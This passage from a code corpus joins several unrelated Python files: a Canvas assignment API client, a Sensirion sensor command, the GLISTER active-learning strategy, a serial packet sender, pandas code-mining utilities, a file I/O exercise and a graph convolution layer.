def list_canvas_assignments(self):
"""
List Canvas assignments
Returns:
list: A list of assignment dicts from Canvas
"""
url = urljoin(settings.CANVAS_BASE_URL, "/api/v1/courses/{course_id}/assignments".format(
course_id=self.canvas_course_id
))
return self._paginate(url)
def get_assignments_by_int_id(self):
assignments = self.list_canvas_assignments()
assignments_dict = {
assignment.get("integration_id"): assignment["id"]
for assignment in assignments
if assignment.get("integration_id") is not None
}
assignments_without_integration_id = sorted([
assignment["id"] for assignment in assignments if assignment.get("integration_id") is None
])
if assignments_without_integration_id:
log.warning(
"These assignments are missing an integration_id: %s",
", ".join(str(assignment_id) for assignment_id in assignments_without_integration_id)
)
return assignments_dict
def list_canvas_grades(self, assignment_id):
"""
List grades for a Canvas assignment
Args:
assignment_id (int): The canvas assignment id
"""
url = urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments/{assignment_id}/submissions".format(
course_id=self.canvas_course_id,
assignment_id=assignment_id,
)
)
return self._paginate(url)
def create_canvas_assignment(self, payload):
"""
Create an assignment on Canvas
Args:
payload (dict):
"""
return self.session.post(
url=urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments".format(course_id=self.canvas_course_id)
),
json=payload,
)
def update_assignment_grades(self, canvas_assignment_id, payload):
return self.session.post(
url=urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments/{assignment_id}/submissions/update_grades".format(
course_id=self.canvas_course_id,
assignment_id=canvas_assignment_id
)
),
data=payload,
)
def create_assignment_payload(subsection_block):
"""
Create a Canvas assignment dict matching a subsection block on edX
Args:
subsection_block (openedx.core.djangoapps.content.block_structure.block_structure.BlockData):
The block data for the graded assignment/exam (in the structure of a course, this unit is a subsection)
Returns:
dict:
Assignment payload to be sent to Canvas to create or update the assignment
"""
return {
"assignment": {
"name": subsection_block.display_name,
"integration_id": str(subsection_block.location),
"grading_type": "percent",
"points_possible": DEFAULT_ASSIGNMENT_POINTS,
"due_at": (
None if not subsection_block.fields.get("due")
# The internal API gives us a TZ-naive datetime for the due date, but Studio indicates that
# the user should enter a UTC datetime for the due date. Coerce this to UTC before creating the
# string representation.
else subsection_block.fields["due"].astimezone(pytz.UTC).isoformat()
),
"submission_types": ["none"],
"published": False,
}
}
def update_grade_payload_kv(user_id, grade_percent):
"""
Returns a key/value pair that will be used in the body of a bulk grade update request
Args:
user_id (int): The Canvas user ID
grade_percent (numpy.float64): The percent score of the grade (between 0 and 1)
Returns:
(tuple): A key/value pair that will be used in the body of a bulk grade update request
"""
return (
"grade_data[{user_id}][posted_grade]".format(user_id=user_id),
"{pct}%".format(pct=grade_percent * 100)
)
| 2.359375 | 2 |
sensirion_shdlc_driver/commands/device_version.py | Sensirion/python-shdlc-driver | 3 | 12796811 | <reponame>Sensirion/python-shdlc-driver
# -*- coding: utf-8 -*-
# (c) Copyright 2019 Sensirion AG, Switzerland
from __future__ import absolute_import, division, print_function
from ..command import ShdlcCommand
from ..types import FirmwareVersion, HardwareVersion, ProtocolVersion, Version
import logging
log = logging.getLogger(__name__)
class ShdlcCmdDeviceVersionBase(ShdlcCommand):
"""
SHDLC command 0xD1: "Get Version".
"""
def __init__(self, *args, **kwargs):
super(ShdlcCmdDeviceVersionBase, self).__init__(0xD1, *args, **kwargs)
class ShdlcCmdGetVersion(ShdlcCmdDeviceVersionBase):
def __init__(self):
super(ShdlcCmdGetVersion, self).__init__(
data=[], max_response_time=0.5,
min_response_length=7, max_response_length=7
)
def interpret_response(self, data):
data_bytes = bytearray(data) # Make the [] operator returning a byte
return Version(
firmware=FirmwareVersion(
major=data_bytes[0],
minor=data_bytes[1],
debug=bool(data_bytes[2])
),
hardware=HardwareVersion(
major=data_bytes[3],
minor=data_bytes[4]
),
protocol=ProtocolVersion(
major=data_bytes[5],
minor=data_bytes[6]
)
)
| 2.421875 | 2 |
swine/terminal/commands/standard/__init__.py | DeflatedPickle/swine | 4 | 12796812 | <filename>swine/terminal/commands/standard/__init__.py<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .command_help import CommandHelp
from .command_commands import CommandCommands
| 1.328125 | 1 |
distil/active_learning_strategies/glister.py | SatyadevNtv/distil | 1 | 12796813 | <gh_stars>1-10
from .strategy import Strategy
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
import math
class GLISTER(Strategy):
"""
This is implementation of GLISTER-ACTIVE from the paper GLISTER: Generalization based Data
Subset Selection for Efficient and Robust Learning :footcite:`killamsetty2020glister`. GLISTER
methods tries to solve a bi-level optimisation problem.
.. math::
\\overbrace{\\underset{{S \\subseteq {\\mathcal U}, |S| \\leq k}}{\\operatorname{argmin\\hspace{0.7mm}}} L_V(\\underbrace{\\underset{\\theta}{\\operatorname{argmin\\hspace{0.7mm}}} L_T( \\theta, S)}_{inner-level}, {\\mathcal V})}^{outer-level}
In the above equation, :math:`\\mathcal{U}` denotes the Data without lables i.e. `unlabeled_x`,
:math:`\\mathcal{V}` denotes the validation set that guides the subset selection process, :math:`L_T` denotes the
training loss, :math:`L_V` denotes the validation loss, :math:`S` denotes the data subset selected at each round, and :math:`k` is the `budget`.
Since, solving the complete inner-optimization is expensive, GLISTER-ONLINE adopts a online one-step meta approximation where we approximate the solution to inner problem
by taking a single gradient step.
The optimization problem after the approximation is as follows:
.. math::
\\overbrace{\\underset{{S \\subseteq {\\mathcal U}, |S| \\leq k}}{\\operatorname{argmin\\hspace{0.7mm}}} L_V(\\underbrace{\\theta - \\eta \\nabla_{\\theta}L_T(\\theta, S)}_{inner-level}, {\\mathcal V})}^{outer-level}
In the above equation, :math:`\\eta` denotes the step-size used for one-step gradient update.
Parameters
----------
X: Numpy array
Features of the labled set of points
Y: Numpy array
Lables of the labled set of points
unlabeled_x: Numpy array
Features of the unlabled set of points
net: class object
Model architecture used for training. Could be instance of models defined in `distil.utils.models` or something similar.
handler: class object
It should be a subclass of torch.utils.data.Dataset i.e, have __getitem__ and __len__ methods implemented, so that is could be passed to pytorch DataLoader.Could be instance of handlers defined in `distil.utils.DataHandler` or something similar.
nclasses: int
No. of classes in tha dataset
args: dictionary
This dictionary should have keys 'batch_size' and 'lr'.
'lr' should be the learning rate used for training. 'batch_size' 'batch_size' should be such
that one can exploit the benefits of tensorization while honouring the resourse constraits.
valid: boolean
Whether validation set is passed or not
X_val: Numpy array, optional
Features of the points in the validation set. Mandatory if `valid=True`.
Y_val:Numpy array, optional
Lables of the points in the validation set. Mandatory if `valid=True`.
loss_criterion: class object, optional
The type of loss criterion. Default is **torch.nn.CrossEntropyLoss()**
typeOf: str, optional
Determines the type of regulariser to be used. Default is **'none'**.
For random regulariser use **'Rand'**.
To use Facility Location set functiom as a regulariser use **'FacLoc'**.
To use Diversity set functiom as a regulariser use **'Diversity'**.
lam: float, optional
Determines the amount of regularisation to be applied. Mandatory if is not `typeOf='none'` and by default set to `None`.
For random regulariser use values should be between 0 and 1 as it determines fraction of points replaced by random points.
For both 'Diversity' and 'FacLoc', `lam` determines the weightage given to them while computing the gain.
kernel_batch_size: int, optional
For 'Diversity' and 'FacLoc' regualrizer versions, similarity kernel is to be computed, which
entails creating a 3d torch tensor of dimenssions kernel_batch_size*kernel_batch_size*
feature dimenssion.Again kernel_batch_size should be such that one can exploit the benefits of
tensorization while honouring the resourse constraits.
"""
def __init__(self,X, Y,unlabeled_x, net, handler, nclasses, args,valid,X_val=None,Y_val=None,\
loss_criterion=nn.CrossEntropyLoss(),typeOf='none',lam=None,kernel_batch_size = 200): #
super(GLISTER, self).__init__(X, Y, unlabeled_x, net, handler,nclasses, args)
if valid:
self.X_Val = X_val
self.Y_Val = Y_val
self.loss = loss_criterion
self.valid = valid
self.typeOf = typeOf
self.lam = lam
self.kernel_batch_size = kernel_batch_size
#self.device = "cuda" if torch.cuda.is_available() else "cpu"
def distance(self,x, y, exp = 2):
n = x.size(0)
m = y.size(0)
d = x.size(1)
x = x.unsqueeze(1).expand(n, m, d)
y = y.unsqueeze(0).expand(n, m, d)
if self.typeOf == "FacLoc":
dist = torch.pow(x - y, exp).sum(2)
elif self.typeOf == "Diversity":
dist = torch.exp((-1 * torch.pow(x - y, exp).sum(2))/2)
return dist
def _compute_similarity_kernel(self):
g_is = []
for item in range(math.ceil(len(self.grads_per_elem) / self.kernel_batch_size)):
inputs = self.grads_per_elem[item *self.kernel_batch_size:(item + 1) *self.kernel_batch_size]
g_is.append(inputs)
with torch.no_grad():
new_N = len(self.grads_per_elem)
self.sim_mat = torch.zeros([new_N, new_N], dtype=torch.float32).to(self.device)
first_i = True
for i, g_i in enumerate(g_is, 0):
if first_i:
size_b = g_i.size(0)
first_i = False
for j, g_j in enumerate(g_is, 0):
self.sim_mat[i * size_b: i * size_b + g_i.size(0),
j * size_b: j * size_b + g_j.size(0)] = self.distance(g_i, g_j)
if self.typeOf == "FacLoc":
const = torch.max(self.sim_mat).item()
#self.sim_mat = const - self.sim_mat
self.min_dist = (torch.ones(new_N, dtype=torch.float32)*const).to(self.device)
def _compute_per_element_grads(self):
self.grads_per_elem = self.get_grad_embedding(self.unlabeled_x)
self.prev_grads_sum = torch.sum(self.get_grad_embedding(self.X,self.Y),dim=0).view(1, -1)
def _update_grads_val(self,grads_currX=None, first_init=False):
embDim = self.model.get_embedding_dim()
if first_init:
if self.valid:
if self.X_Val is not None:
loader = DataLoader(self.handler(self.X_Val,self.Y_Val,select=False),shuffle=False,\
batch_size=self.args['batch_size'])
self.out = torch.zeros(self.Y_Val.shape[0], self.target_classes).to(self.device)
self.emb = torch.zeros(self.Y_Val.shape[0], embDim).to(self.device)
else:
raise ValueError("Since Valid is set True, please pass a appropriate Validation set")
else:
predicted_y = self.predict(self.unlabeled_x)
self.X_new = np.concatenate((self.unlabeled_x,self.X), axis = 0)
self.Y_new = np.concatenate((predicted_y,self.Y), axis = 0)
loader = DataLoader(self.handler(self.X_new,self.Y_new,select=False),shuffle=False,\
batch_size=self.args['batch_size'])
self.out = torch.zeros(self.Y_new.shape[0], self.target_classes).to(self.device)
self.emb = torch.zeros(self.Y_new.shape[0], embDim).to(self.device)
self.grads_val_curr = torch.zeros(self.target_classes*(1+embDim), 1).to(self.device)
with torch.no_grad():
for x, y, idxs in loader:
x = x.to(self.device)
y = y.to(self.device)
init_out, init_l1 = self.model(x,last=True)
self.emb[idxs] = init_l1
for j in range(self.target_classes):
try:
self.out[idxs, j] = init_out[:, j] - (1 * self.args['lr'] * (torch.matmul(init_l1, self.prev_grads_sum[0][(j * embDim) +
self.target_classes:((j + 1) * embDim) + self.target_classes].view(-1, 1)) + self.prev_grads_sum[0][j])).view(-1)
except KeyError:
print("Please pass learning rate used during the training")
scores = F.softmax(self.out[idxs], dim=1)
one_hot_label = torch.zeros(len(y), self.target_classes).to(self.device)
one_hot_label.scatter_(1, y.view(-1, 1), 1)
l0_grads = scores - one_hot_label
l0_expand = torch.repeat_interleave(l0_grads, embDim, dim=1)
l1_grads = l0_expand * init_l1.repeat(1, self.target_classes)
self.grads_val_curr += torch.cat((l0_grads, l1_grads), dim=1).sum(dim=0).view(-1, 1)
if self.valid:
self.grads_val_curr /= self.Y_Val.shape[0]
else:
self.grads_val_curr /= predicted_y.shape[0]
elif grads_currX is not None:
# update params:
with torch.no_grad():
for j in range(self.target_classes):
try:
self.out[:, j] = self.out[:, j] - (1 * self.args['lr'] * (torch.matmul(self.emb, grads_currX[0][(j * embDim) +
self.target_classes:((j + 1) * embDim) + self.target_classes].view(-1, 1)) + grads_currX[0][j])).view(-1)
except KeyError:
print("Please pass learning rate used during the training")
scores = F.softmax(self.out, dim=1)
if self.valid:
Y_Val = torch.tensor(self.Y_Val,device=self.device)
one_hot_label = torch.zeros(Y_Val.shape[0], self.target_classes).to(self.device)
one_hot_label.scatter_(1,Y_Val.view(-1, 1), 1)
else:
one_hot_label = torch.zeros(self.Y_new.shape[0], self.target_classes).to(self.device)
one_hot_label.scatter_(1, torch.tensor(self.Y_new,device=self.device).view(-1, 1), 1)
l0_grads = scores - one_hot_label
l0_expand = torch.repeat_interleave(l0_grads, embDim, dim=1)
l1_grads = l0_expand * self.emb.repeat(1, self.target_classes)
self.grads_val_curr = torch.cat((l0_grads, l1_grads), dim=1).mean(dim=0).view(-1, 1)
def eval_taylor_modular(self, grads,greedySet=None,remset=None):
with torch.no_grad():
if self.typeOf == "FacLoc":
gains = torch.matmul(grads, self.grads_val_curr) + self.lam*((self.min_dist - \
torch.min(self.min_dist,self.sim_mat[remset])).sum(1)).view(-1, 1).to(self.device)
elif self.typeOf == "Diversity" and len(greedySet) > 0:
gains = torch.matmul(grads, self.grads_val_curr) - \
self.lam*self.sim_mat[remset][:, greedySet].sum(1).view(-1, 1).to(self.device)
else:
gains = torch.matmul(grads, self.grads_val_curr)
return gains
def select(self, budget):
"""
Select next set of points
Parameters
----------
budget: int
Number of indexes to be returned for next set
Returns
----------
chosen: list
List of selected data point indexes with respect to unlabeled_x
"""
self._compute_per_element_grads()
self._update_grads_val(first_init=True)
numSelected = 0
greedySet = list()
remainSet = list(range(self.unlabeled_x.shape[0]))
if self.typeOf == 'Rand':
if self.lam is not None:
if self.lam >0 and self.lam < 1:
curr_bud = (1-self.lam)*budget
else:
raise ValueError("Lambda value should be between 0 and 1")
else:
raise ValueError("Please pass a appropriate lambda value for random regularisation")
else:
curr_bud = budget
if self.typeOf == "FacLoc" or self.typeOf == "Diversity":
if self.lam is not None:
self._compute_similarity_kernel()
else:
if self.typeOf == "FacLoc":
raise ValueError("Please pass a appropriate lambda value for Facility Location based regularisation")
elif self.typeOf == "Diversity":
raise ValueError("Please pass a appropriate lambda value for Diversity based regularisation")
while (numSelected < curr_bud):
if self.typeOf == "Diversity":
gains = self.eval_taylor_modular(self.grads_per_elem[remainSet],greedySet,remainSet)
elif self.typeOf == "FacLoc":
gains = self.eval_taylor_modular(self.grads_per_elem[remainSet],remset=remainSet)
else:
gains = self.eval_taylor_modular(self.grads_per_elem[remainSet])#rem_grads)
bestId = remainSet[torch.argmax(gains).item()]
greedySet.append(bestId)
remainSet.remove(bestId)
numSelected += 1
self._update_grads_val(self.grads_per_elem[bestId].view(1, -1))
if self.typeOf == "FacLoc":
self.min_dist = torch.min(self.min_dist,self.sim_mat[bestId])
if self.typeOf == 'Rand':
greedySet.extend(list(np.random.choice(remainSet, size=budget - int(curr_bud),replace=False)))
return greedySet | 3 | 3 |
dr-sender.py | valerio-vaccaro/disaster.share | 0 | 12796814 | <gh_stars>0
import time
import serial
import math
import base64
import hashlib
MAX_SIZE = 200
MAGIC = b'BTC'
def serwrite(buff):
for i in range(0, len(buff)):
ser.write(buff[i].encode('ascii'))
time.sleep(0.001)
ser.write('\r'.encode('ascii'))
ser.write('\n'.encode('ascii'))
def serread():
out = ''
while 1:
buf = ser.read(1000).decode('ascii')
time.sleep(0.1)
if len(buf) == 0:
break
out += buf
return out
ser = serial.Serial(
port='/dev/cu.SLAB_USBtoUART',
baudrate=115200,
timeout=0.1,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
xonxoff = False, #disable software flow control
rtscts = False, #disable hardware (RTS/CTS) flow control
dsrdtr = False, #disable hardware (DSR/DTR) flow control
writeTimeout = 2, #timeout for writ
)
ser.isOpen()
out = serread()
if out != '':
print(">>" + out)
serwrite('/join BTC')
out = serread()
if out != '':
print(">>" + out)
big_tx_b = b'+'+b'12345678'*200+b'+'
big_tx = base64.a85encode(big_tx_b)
packet_num = math.ceil(len(big_tx)/MAX_SIZE)
hash = hashlib.sha256(big_tx_b).hexdigest()[:8]
for i in range(0, packet_num):
packet = '{}:{}:{}:{}:{}'.format(MAGIC.decode('ascii'), hash, hex(i+1)[2:], hex(packet_num)[2:], big_tx[i*MAX_SIZE:(i+1)*MAX_SIZE].decode('ascii'))
serwrite(packet)
time.sleep(2)
out = serread()
if out != '':
print(">>" + out)
ser.close()
| 2.53125 | 3 |
databutler/mining/kaggle/static_analysis/pandas_mining_utils.py | rbavishi/databutler | 0 | 12796815 | import builtins
import collections
import contextlib
import glob
import io
import os
import string
from typing import Dict, Any, Tuple, List, Collection, Optional
import attrs
import pandas as pd
from databutler.pat import astlib
from databutler.pat.analysis.type_analysis.mypy_types import SerializedMypyType
DF_TYPE = "pandas.core.frame.DataFrame"
SERIES_TYPE = "pandas.core.series.Series"
DF_GROUPBY_TYPE = "pandas.core.groupby.generic.DataFrameGroupBy"
SERIES_GROUPBY_TYPE = "pandas.core.groupby.generic.SeriesGroupBy"
BASE_GROUPBY_TYPE = "pandas.core.groupby.groupby.GroupBy"
GROUPBY_TYPES = {
BASE_GROUPBY_TYPE,
DF_GROUPBY_TYPE,
SERIES_GROUPBY_TYPE,
}
NewTarget = astlib.AstNode
DfArgs = List[str]
SeriesArgs = List[str]
NodeReplMap = Dict[astlib.AstNode, astlib.AstNode]
JsonDict = Dict
_BUILTIN_FUNCS = {k for k in builtins.__dict__ if not k.startswith("_")}
@attrs.define(eq=False, repr=False)
class MinedResult:
code: str
template: str
kind: str
nb_owner: str
nb_slug: str
uid: str
expr_type: Optional[SerializedMypyType]
type_map: Dict[str, SerializedMypyType]
df_vars: List[str]
series_vars: List[str]
template_vars: Dict[str, List[str]]
lib_usages: Dict[str, str] = attrs.field(factory=dict)
def to_json(self) -> JsonDict:
pass
@classmethod
def from_json(cls, json_dict: JsonDict) -> 'MinedResult':
pass
def prettify(self) -> str:
with contextlib.redirect_stdout(io.StringIO()) as f_out:
url = f"https://kaggle.com/{self.nb_owner}/{self.nb_slug}"
print(f"UID: {self.uid}\nKind: {self.kind}\nURL: {url}")
print("----------")
print(f"Code:\n{self.code}")
print("----------")
print(f"Templatized:\n{self.template}")
print("----------")
print(f"Value Type: {'Any' if self.expr_type is None else self.expr_type.type_json}")
print("==========")
return f_out.getvalue()
def __repr__(self):
return self.prettify()
def __str__(self):
return self.prettify()
def is_purely_df_or_series_like(expr_type: SerializedMypyType):
if not (expr_type.equals(DF_TYPE) or expr_type.equals(SERIES_TYPE)):
return False
if expr_type.is_union_type():
return all(is_purely_df_or_series_like(i) or i.is_any_type() for i in expr_type.unpack_union_type())
else:
return True
def find_library_usages(
code_ast: astlib.AstNode
) -> Dict[astlib.Name, str]:
"""Finds variable uses that correspond to imports / library usage"""
# TODO: Perform proper dataflow analysis (reaching defs)
result: Dict[astlib.Name, str] = {}
defs, accesses = astlib.get_definitions_and_accesses(code_ast)
for def_ in defs:
if def_.enclosing_node is not None and isinstance(def_.enclosing_node, (astlib.Import, astlib.ImportFrom)):
key_dict = {}
if isinstance(def_.enclosing_node, astlib.Import):
prefix = ""
elif isinstance(def_.enclosing_node, astlib.ImportFrom) and def_.enclosing_node.module is not None:
prefix = astlib.to_code(def_.enclosing_node.module).strip() + "."
else:
continue
for alias in def_.enclosing_node.names:
name_str = astlib.to_code(alias.name).strip()
if alias.asname is None:
key_dict[name_str] = f"{prefix}{name_str}"
else:
key_dict[astlib.to_code(alias.asname.name).strip()] = f"{prefix}{name_str}"
for access in accesses:
if isinstance(access.node, astlib.Name):
if access.node.value in key_dict:
result[access.node] = key_dict[access.node.value]
return result
def find_constants(code_ast: astlib.AstNode) -> Dict[astlib.BaseExpression, Any]:
"""Finds constant expressions in the AST. Sound but not necessarily complete right now."""
# TODO: Perform proper dataflow analysis (constant propagation)
result: Dict[astlib.BaseExpression, Any] = {}
defs, accesses = astlib.get_definitions_and_accesses(code_ast)
# We will only focus on accesses whose defs are top-level statements to avoid
# having to bother about loops etc.
top_level_stmts = set(astlib.iter_body_stmts(code_ast))
accesses = [a for a in accesses if all(d.enclosing_node in top_level_stmts for d in a.definitions)]
numbering: Dict[astlib.AstNode, int] = {}
for idx, stmt in enumerate(astlib.iter_body_stmts(code_ast)):
for node in astlib.walk(stmt):
numbering[node] = idx
for access in accesses:
num = numbering[access.node]
# Find the closest top-level def
cur, score = None, None
for def_ in access.definitions:
d_num = numbering[def_.enclosing_node]
if d_num < num and (score is None or d_num > score):
cur, score = def_, d_num
if cur is None:
continue
if not isinstance(cur.enclosing_node, (astlib.AnnAssign, astlib.Assign)):
continue
if astlib.is_constant(cur.enclosing_node.value):
val = astlib.get_constant_value(cur.enclosing_node.value)
result[access.node] = val
return result
def replace_constants(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
constants: Dict[astlib.BaseExpression, Any],
) -> Tuple[NewTarget, NodeReplMap]:
"""Replace any constant variables with their concrete values, and update the inferred types dict"""
repl_dict = {}
for node in true_exprs:
if (not isinstance(node, astlib.Name)) or node not in free_vars:
continue
if node in constants:
repl_dict[node] = astlib.parse_expr(repr(constants[node]))
if len(repl_dict) == 0:
return target, {n: n for n in astlib.walk(target)}
output_mapping = {}
target = astlib.with_deep_replacements(target, repl_dict, output_mapping)
return target, output_mapping
def has_undefined_references(
target: astlib.AstNode,
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
lib_usages: Dict[astlib.Name, str],
) -> bool:
"""Checks if there are any undefined variables that are not library usages and not dfs/series"""
for node in free_vars:
if node not in lib_usages:
if node not in inferred_types:
return True
typ = inferred_types[node]
is_builtin_func = typ.is_callable_type() and node.value in _BUILTIN_FUNCS
if not (typ.equals(DF_TYPE) or typ.equals(SERIES_TYPE) or typ.is_bool_type() or is_builtin_func):
return True
return False
def normalize_df_series_vars(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
) -> Tuple[NewTarget, DfArgs, SeriesArgs, NodeReplMap]:
"""Replaces variables corresponding to dataframes or series with standard names"""
seen_dfs: Dict[str, int] = {}
df_repl_map: Dict[astlib.Name, astlib.Name] = {}
seen_series: Dict[str, int] = {}
series_repl_map: Dict[astlib.Name, astlib.Name] = {}
for node in true_exprs:
if (not isinstance(node, astlib.Name)) or node not in inferred_types or node not in free_vars:
continue
# NOTE: If there is a union type of DataFrame and Series, DataFrame will be picked.
if inferred_types[node].equals(DF_TYPE):
if node.value not in seen_dfs:
seen_dfs[node.value] = len(seen_dfs) + 1
df_repl_map[node] = node # Will update later
elif inferred_types[node].equals(SERIES_TYPE):
if node.value not in seen_series:
seen_series[node.value] = len(seen_series) + 1
series_repl_map[node] = node # Will update later
if len({i.value for i in df_repl_map.keys()}) <= 1:
def df_arg_creator(ctr: int):
return "df"
else:
def df_arg_creator(ctr: int):
return f"df{ctr}"
if len({i.value for i in series_repl_map.keys()}) <= 1:
def series_arg_creator(ctr: int):
return "series"
else:
def series_arg_creator(ctr: int):
return f"series{ctr}"
for node in df_repl_map.keys():
df_repl_map[node] = astlib.create_name_expr(df_arg_creator(seen_dfs[node.value]))
for node in series_repl_map.keys():
series_repl_map[node] = astlib.create_name_expr(series_arg_creator(seen_series[node.value]))
output_map: NodeReplMap = {}
target = astlib.with_deep_replacements(target, {**df_repl_map, **series_repl_map}, output_map)
return (target,
sorted(i.value for i in df_repl_map.values()),
sorted(i.value for i in series_repl_map.values()),
output_map)
def normalize_call_args(
target: astlib.AstNode, inferred_types: Dict[astlib.BaseExpression, SerializedMypyType]
) -> Tuple[NewTarget, NodeReplMap]:
"""Normalize order of keyword arguments"""
repl_map: NodeReplMap = {}
for node in astlib.walk(target):
if not isinstance(node, astlib.Call):
continue
call_expr = node
if (call_expr.func not in inferred_types) or (not inferred_types[call_expr.func].is_callable_type()):
continue
if any(arg.star != "" for arg in call_expr.args):
# TODO: How to handle starred args?
continue
pos_args = [arg for arg in call_expr.args if arg.keyword is None]
kw_args = [arg for arg in call_expr.args if arg.keyword is not None]
arg_order = inferred_types[call_expr.func].get_callable_arg_order()
new_args = [*pos_args] + sorted(kw_args, key=lambda x: arg_order.get(x.keyword.value, 0))
if len(new_args) > 0:
new_args[-1] = new_args[-1].with_changes(comma=astlib.cst.MaybeSentinel.DEFAULT)
if new_args != call_expr.args:
repl_map[call_expr] = call_expr.with_changes(args=new_args)
output_mapping: NodeReplMap = {}
if len(repl_map) != 0:
target = astlib.with_deep_replacements(target, repl_map, output_mapping)
return target, output_mapping
def normalize_col_accesses(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType]
) -> Tuple[NewTarget, NodeReplMap]:
"""Normalizes col accesses by converting attribute-based accesses like df.Price to
subscript-based such as df['Price']"""
repl_map: NodeReplMap = {}
for expr in true_exprs:
if expr not in inferred_types:
continue
expr_typ = inferred_types[expr]
if isinstance(expr, astlib.Attribute):
value = expr.value
if value not in inferred_types:
continue
val_typ = inferred_types[value]
okay = False
# print("GOT HERE", val_typ, expr_typ)
if val_typ.equals(DF_TYPE) and (expr_typ.equals(DF_TYPE) or expr_typ.equals(SERIES_TYPE)):
try:
if (not hasattr(pd.DataFrame, expr.attr.value)) and (not hasattr(pd.Series, expr.attr.value)):
okay = True
except:
pass
elif (val_typ.equals(DF_GROUPBY_TYPE) and
(expr_typ.equals(DF_GROUPBY_TYPE) or expr_typ.equals(SERIES_GROUPBY_TYPE))):
try:
if not hasattr(pd.core.groupby.generic.DataFrameGroupBy, expr.attr.value):
okay = True
except:
pass
if okay:
new_node = astlib.parse_expr(f"dummy[\"{expr.attr.value}\"]").with_changes(value=expr.value)
repl_map[expr] = new_node
output_mapping: NodeReplMap = {}
if len(repl_map) != 0:
target = astlib.with_deep_replacements(target, repl_map, output_mapping)
return target, output_mapping
def templatize(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
lib_usages: Dict[astlib.Name, str],
) -> Tuple[NewTarget, Dict[str, List[str]]]:
"""Replace constants and remaining variable names with standard ones to create a template suitable for clustering"""
type_to_exprs: Dict[str, List[astlib.BaseExpression]] = collections.defaultdict(list)
allowed_key_chars = set(string.ascii_letters + string.digits + "_")
for node in true_exprs:
is_const = astlib.is_constant(node)
const_val = None if not is_const else astlib.get_constant_value(node)
if not ((isinstance(node, astlib.Name) and node in free_vars) or
(is_const and not isinstance(const_val, (set, dict, list, tuple)))):
continue
if node in lib_usages:
continue
if node not in inferred_types:
if not is_const:
continue
key = type(const_val).__name__
else:
typ = inferred_types[node]
if typ.equals(DF_TYPE):
key = "df"
elif typ.equals(SERIES_TYPE):
key = "series"
elif typ.is_callable_type():
continue
elif typ.is_str_type():
key = "str"
elif typ.is_int_type():
key = "int"
elif typ.is_bool_type():
if isinstance(node, astlib.Name) and node.value in {"True", "False"}:
continue
key = "bool"
elif typ.is_float_type():
key = "float"
else:
while typ.is_union_type():
typ = typ.unpack_union_type()[0]
if isinstance(typ.type_json, str):
key = typ.type_json
else:
key = str(typ.type_json.get('.class', "VAR"))
key = "".join(i if i in allowed_key_chars else '_' for i in key)
type_to_exprs[key].append(node)
# print("Adding", key, astlib.to_code(node))
ctr_map: Dict[str, Dict[str, int]] = {k: {} for k in type_to_exprs.keys()}
repl_map: NodeReplMap = {}
names_map: Dict[str, List[str]] = collections.defaultdict(list)
for typ_key, exprs in type_to_exprs.items():
ctr_map_entry = ctr_map[typ_key]
for expr in exprs:
node_key = astlib.to_code(expr)
if node_key not in ctr_map_entry:
ctr_map_entry[node_key] = idx = len(ctr_map_entry) + 1
names_map[typ_key].append(f"{typ_key.upper()}{idx}")
idx = ctr_map_entry[node_key]
repl_map[expr] = astlib.create_name_expr(f"{typ_key.upper()}{idx}")
return astlib.with_deep_replacements(target, repl_map), names_map
def get_mypy_cache_dir_path(uid: int) -> str:
"""Returns a cache dir to use for mypy based on a UID. Useful for multiprocess safety."""
script_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(script_dir, f".mypy_cache{uid}")
def get_created_mypy_cache_dir_paths() -> List[str]:
"""Returns all the created mypy cache dirs"""
script_dir = os.path.abspath(os.path.dirname(__file__))
return glob.glob(os.path.join(script_dir, ".mypy_cache*"))
| 2.1875 | 2 |
015_011_19.py | priyankakushi/machine-learning | 0 | 12796816 | <gh_stars>0
# File Input Output
# Write in a file
'''file = open("abc.txt", "w+")
file.write("python is great language. \nYeah its great! !\n")
file. write ("How are you. \nYeah its great! ! \n")
file. write ("Hello Priyanka!\n")
file.close()
# Read through file
file = open("abc.txt", "r+")
#print(file.read())
#print(file.readlines())
print(file.readline())
print(file.readable())
file.close()
# Use of Append in File
# Difference between write and append
file = open("abc.txt", "a+")
file.write("How are you!\n")
file.write("What are you doing today!\n")
print(file.tell())
file.close()'''
file = open("abc.txt", "w+")
file.write("hello Soni!\n")
file.write("how are you!\n")
file.close()
#read through file
file = open("abc.txt", "r+")
#print(file.read())
#print(file.readline())
#print(file.readlines())
print(file.readable())
print(file.read(3))
file.close()
#use of append in file
file = open("abc.txt", "a+")
file.write("what are you doing!\n")
print(file.tell())
file.close()
| 4.1875 | 4 |
pythia-gen/flow/models/ptconv.py | okitouni/HEP-Geometric | 0 | 12796817 | <reponame>okitouni/HEP-Geometric
from torch_geometric.nn import MessagePassing
from typing import Optional, Callable, Union
from torch import Tensor
from torch_geometric.typing import PairTensor, Adj
class PtConv(MessagePassing):
def __init__(self, nn: Callable, aggr: str = 'max', **kwargs):
super(PtConv, self).__init__(aggr=aggr, **kwargs)
self.nn = nn
def forward(self, x: Union[Tensor, PairTensor], edge_index: Adj) -> Tensor:
""""""
if isinstance(x, Tensor):
x: PairTensor = (x, x)
# propagate_type: (x: PairTensor)
return self.propagate(edge_index, x=x, size=None,test=None)
# test here is place holder for anything that could used in the
# message passing step
def message(self, x_i: Tensor, x_j: Tensor, test) -> Tensor:
return self.nn(x_i)
def __repr__(self):
